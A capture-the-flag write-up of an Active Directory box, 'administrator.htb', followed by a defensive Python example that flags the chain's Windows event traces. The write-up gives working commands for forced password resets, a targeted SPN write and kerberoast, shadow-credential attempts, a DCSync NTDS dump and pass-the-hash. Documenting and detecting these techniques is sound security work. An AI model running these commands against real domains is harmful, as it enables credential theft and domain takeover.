# Lessons Learned

- When we see `GenericWrite`, think shadow creds attack
- Skip `certipy-ad` enum and shadow creds attacks if ADCS is not enabled
- If there is a gap in the AD attack chain, climb the chain as far as you can go and enumerate further

---

# After-Action Attack Sequence

- After running `rusthound-ce` with the given creds, we see a clear path from olivia to benjamin
- Also, we see a path from emily to ethan, who can DCSync
- But we have a gap between benjamin and emily
- Laterally move from olivia to benjamin with the help of `bloodyAD`
- Conduct additional enum of SMB and FTP as benjamin
- This leads us to `Backup.psafe3` on the FTP server
- Use `pwsafe2john` and crack the Password Safe password with `john`
- This provides the password for emily
- Laterally move from emily to ethan by adding an SPN to ethan and kerberoasting
- Perform the DCSync with `nxc smb [...] --ntds` in lieu of `secretsdump.py`
- PtH with `evil-winrm` to gain an interactive shell on the DC as administrator

---

# Discover Ports & Services

- `ping` test
  ![[images/Pasted image 20260319180006.png]]
- `nmap` scan - light
  ![[images/Pasted image 20260319180033.png]]
- Looks like a DC
- `nmap` scan - detailed
  ![[images/Pasted image 20260319181339.png]]
- Note: significant clock skew > use `rdate` or `faketime` when issuing Kerberos or ADCS related commands
- Add `administrator.htb` to `/etc/hosts`

---

# Service Enum

## Port 445 (SMB)

### Shares

- Use the given creds to enum shares
  ![[images/Pasted image 20260319181915.png]]
- Nothing in the default shares
- Revisit when we get creds for other users

### Users

- Enum password policy
  ![[images/Pasted image 20260319182000.png]]
- Enum users
  ![[images/Pasted image 20260319181903.png]]
- Create `users.txt` based on the above
  ![[images/Pasted image 20260319182306.png]]

## Port 21 (FTP): Microsoft ftpd

- Cannot log in as olivia
  ![[images/Pasted image 20260319183117.png]]
  ![[images/Pasted image 20260319183006.png]]
- Revisit when we get creds for other users

---

# AD Enum

## ASREP Roasting

- Nope
  ![[images/Pasted image 20260319183351.png]]

## Kerberoasting

- Nope
  ![[images/Pasted image 20260319195555.png]]
- As an alternative to `GetUserSPNs.py`, use `nxc` as below

  ```bash
  nxc ldap TARGET -d inlanefreight.local -u username -p password --kerberoasting
  ```

## ADCS

- Nope
  ![[images/Pasted image 20260319183545.png]]

## BloodHound

- Run `rusthound-ce`
  ![[images/Pasted image 20260319183810.png]]
- Spin up a container for the BloodHound GUI
- Having issues; follow the steps below for a hard reset

  ```bash
  docker compose down -v
  docker compose up -d
  docker compose logs -f | grep -i Pass   # search for the initial password in the docker logs
  ```

- emily is a member of Remote Management Users
  ![[images/Pasted image 20260319194319.png]]
- Chain stops at benjamin
- ethan has DCSync privs
  ![[images/Pasted image 20260319193915.png]]
- emily has GenericWrite over ethan
  ![[images/Pasted image 20260319194116.png]]
- Note: we need to bridge the gap from benjamin to emily

---

# AD Attack Chain

## Lateral Movement: Olivia to Benjamin

![[images/Pasted image 20260319195141.png]]

- Change password for michael as olivia
  ![[images/Pasted image 20260319200738.png]]
- Change password for benjamin as michael
  ![[images/Pasted image 20260319200743.png]]

---

# Revisit Service Enum: Benjamin

- Enum shares
  ![[images/Pasted image 20260319201029.png]]
- Enum FTP
  ![[images/Pasted image 20260319201119.png]]
- Maybe `Backup.psafe3` on the FTP server is the bridge to emily?
  ![[images/Pasted image 20260319201256.png]]

## Break into `Backup.psafe3`

- We need a password to access this
  ![[images/Pasted image 20260319201507.png]]
- Look to see if there is a `pwsafe2john` > yes!
  ![[images/Pasted image 20260319201636.png]]
- Try to crack with `john` > success!
  ![[images/Pasted image 20260319201823.png]]
- We have passwords for alexander, emma, and emily
  ![[images/Pasted image 20260319201942.png]]
- Of course, emily is the target here, as we saw above from the BloodHound output
- Confirm with `nxc smb` > We cooking now!
  ![[images/Pasted image 20260319202337.png]]

---

# PWN DC

![[images/Pasted image 20260319202949.png]]

## Lateral Movement: emily to ethan

- We know that emily has GenericWrite over ethan
- We can abuse this with a shadow creds attack or by adding an SPN to ethan and subsequently kerberoasting ethan

### Shadow Creds Attack

- Try a shadow creds attack as emily to get the hash for ethan
- Getting an SSL wrapping error > some Googling shows that this is because port 636 is tcpwrapped, as we saw in the nmap output

  ```bash
  faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username emily@administrator.htb -p "password" -dc-ip 10.129.6.230 -account ethan
  ```

- Try the workaround below

  ```bash
  faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" certipy-ad shadow auto -username emily@administrator.htb -p "password" -dc-ip 10.129.6.230 -account ethan -ldap-scheme ldap -ldap-port 389 -no-ldap-channel-binding -no-ldap-signing
  ```

- Still getting errors > maybe this is because there is no ADCS
  ![[images/Pasted image 20260319204333.png]]

### Kerberoasting

- First, enumerate the DN for ethan
  ![[images/Pasted image 20260319204635.png]]
- Second, write an SPN for ethan

  ```bash
  bloodyAD --dc-ip 10.129.6.230 -d administrator.htb -u emily -p "password" set object ethan servicePrincipalName -v 'pwn/pwn'
  ```

  ![[images/Pasted image 20260319204932.png]]
- Third, kerberoast ethan

  ```bash
  faketime "$(ntpdate -q 10.129.6.230 | cut -d ' ' -f 1,2)" GetUserSPNs.py administrator.htb/emily:"password" -dc-ip 10.129.6.230 -request-user ethan -output ethan.hash
  ```

  ![[images/Pasted image 20260319205035.png]]
- Fourth, crack the TGS
  ![[images/Pasted image 20260319205439.png]]

## Perform DCSync

- In lieu of `secretsdump.py`, run `nxc smb [...] --ntds`

  ```bash
  nxc smb 10.129.6.230 -d administrator.htb -u ethan -p password --ntds
  ```

  ![[images/Pasted image 20260319205903.png]]
- PtH with `evil-winrm` > that's a wrap!
  ![[images/Pasted image 20260319205925.png]]
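Every hop in the chain above leaves a distinct trace in the Windows Security log on the DC: the olivia > michael > benjamin hops are password resets (event 4724), the SPN written on ethan is a directory object modification (event 5136 on `servicePrincipalName`), the kerberoast itself is an RC4 service-ticket request (event 4769 with encryption type 0x17), and the DCSync is event 4662 exercising the two replication control-access rights. The detection rules below are an added example written from the defender's side; they are not part of the original notes and not the output of any tool on this page. The event records are constructed to mirror the chain, the allow-lists of accounts that may legitimately reset passwords, write SPNs or replicate are assumptions, and the GUIDs are the well-known values for `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`.

```python
"""Detection rules for the abuse primitives in this write-up, run over
constructed Windows Security event records (added example, not from the
original notes). Event IDs, field names and the replication GUIDs are the
standard ones; the accounts, allow-lists and payloads are made up for the demo."""
from collections import defaultdict

# Control-access-right GUIDs that a DCSync exercises (4662 "Properties" field).
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Assumed allow-lists: DC machine accounts, a helpdesk service account and the
# team that legitimately registers SPNs. Everything else is suspect.
REPLICATION_ALLOWED = {"DC$"}
PASSWORD_RESET_ALLOWED = {"helpdesk-svc"}
SPN_WRITE_ALLOWED = {"svc-admins"}


def check_password_reset(ev):
    """4724: a reset by an account outside the helpdesk allow-list is the
    olivia -> michael -> benjamin hop from the notes."""
    if ev["EventID"] == 4724 and ev["SubjectUserName"] not in PASSWORD_RESET_ALLOWED:
        return f"password reset of {ev['TargetUserName']} by {ev['SubjectUserName']}"


def check_spn_write(ev):
    """5136: servicePrincipalName added (%%14674 = value added) on a *user*
    object by a non-admin is the targeted-kerberoast setup."""
    if (ev["EventID"] == 5136
            and ev["AttributeLDAPDisplayName"] == "servicePrincipalName"
            and ev["ObjectClass"] == "user"
            and ev["OperationType"] == "%%14674"
            and ev["SubjectUserName"] not in SPN_WRITE_ALLOWED):
        return f"SPN {ev['AttributeValue']!r} written on {ev['ObjectDN']} by {ev['SubjectUserName']}"


def check_dcsync(ev):
    """4662: replication rights used by anything that is not a DC account."""
    if ev["EventID"] == 4662 and ev["SubjectUserName"] not in REPLICATION_ALLOWED:
        props = ev["Properties"].lower()
        if DS_REPL_GET_CHANGES in props or DS_REPL_GET_CHANGES_ALL in props:
            return f"replication rights used by {ev['SubjectUserName']} (DCSync)"


def check_rc4_tgs(ev):
    """4769: an RC4 (0x17) service ticket for a user SPN (not a machine
    account ending in '$') is the kerberoast signature."""
    if (ev["EventID"] == 4769 and ev["TicketEncryptionType"] == "0x17"
            and not ev["ServiceName"].endswith("$")):
        return f"RC4 TGS for {ev['ServiceName']} requested by {ev['TargetUserName']}"


RULES = (check_password_reset, check_spn_write, check_dcsync, check_rc4_tgs)


def analyse(events):
    """Run every rule over every event; return {rule name: [findings]}."""
    findings = defaultdict(list)
    for ev in events:
        for rule in RULES:
            hit = rule(ev)
            if hit:
                findings[rule.__name__].append(hit)
    return dict(findings)


# Constructed sample events mirroring the chain in the notes (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "helpdesk-svc", "TargetUserName": "emma"},  # benign
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "pwn/pwn", "OperationType": "%%14674"},
    {"EventID": 4769, "TargetUserName": "emily@ADMINISTRATOR.HTB",
     "ServiceName": "ethan", "TicketEncryptionType": "0x17"},
    {"EventID": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12"},  # benign AES ticket
    {"EventID": 4662, "SubjectUserName": "ethan", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "DC$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},  # benign DC replication
]

if __name__ == "__main__":
    for rule_name, hits in analyse(SAMPLE_EVENTS).items():
        print(rule_name, "->", hits)
```

Each rule keys on the event ID first so the field lookups that follow never run against the wrong event shape, and the allow-lists are the part a real deployment tunes: the `servicePrincipalName` rule in particular fires on every non-admin SPN write because, on a user object, that is almost never legitimate.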